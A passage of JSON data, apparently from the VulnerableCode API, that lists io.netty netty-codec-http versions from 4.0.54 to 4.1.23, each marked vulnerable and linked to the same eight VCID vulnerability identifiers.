D-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.54.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193813?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.55.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.55.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193814?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.56.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.56.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193815?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.0.Beta1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.0.Beta1"},{"url":"http://public2.vulnerablecode.io/api/packages/193816?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.0.Beta2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.0.Beta2"},{"url":"http://public2.vulnerablecode.io/api/packages/193817?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.0.Beta3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.0.Beta3"},{"url":"http://public2.vulnerablecode.io/api/packages/193818?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.0.Beta4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.0.Beta4"},{"url":"http://public2.vulnerablecode.io/api/packages/193819?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.0.Beta5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.0.Beta5"},{"url":"http://public2.vulnerablecode.io/api/packages/193820?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.0.Beta6","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.0.Beta6"},{"url":"http://public2.vulnerablecode.io/api/packages/193821?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.0.Beta7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.0.Beta7"},{"url":"http://public2.vulnerablecode.io/api/packages/193822?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.0.Beta8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.0.Beta8"},{"url":"http://public2.vulnerablecode.io/api/packages/193823?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.0.CR1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.0.CR1"},{"url":"http://public2.vulnerablecode.io/api/packages/193824?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.0.CR2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.0.CR2"},{"url":"http://public2.vulnerablecode.io/api/packages/193825?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.0.CR3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.0.CR3"},{"url":"http://public2.vulnerablecode.io/api/packages/193826?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.0.CR4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.0.CR4"},{"url":"http://public2.vulnerablecode.io/api/packages/193827?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.0.CR5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.0.CR5"},{"url":"http://public2.vulnerablecode.io/api/packages/193828?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.0.CR6","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.0.CR6"},{"url":"http://public2.vulnerablecode.io/api/packages/193829?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.0.CR7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.0.CR7"},{"url":"http://public2.vulnerablecode.io/api/packages/193830?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.0.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.0.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193831?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.1.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.1.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193832?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.2.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.2.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193833?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.3.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.3.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193834?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.4.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.4.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193835?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.5.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.5.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193836?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.6.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.6.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193837?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.7.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.7.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193838?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.8.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.8.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193839?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.9.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.9.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193840?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.10.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.10.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193841?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.11.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.11.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193842?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.12.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.12.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193843?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.13.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.13.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193844?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.14.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.14.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193845?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.15.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.15.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193846?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.16.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.16.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193847?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.17.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.17.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193848?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.18.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.18.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193849?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.19.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.19.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193850?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.20.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.20.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193851?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.21.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.21.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193852?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.22.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.22.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193853?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.23.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.23.Fina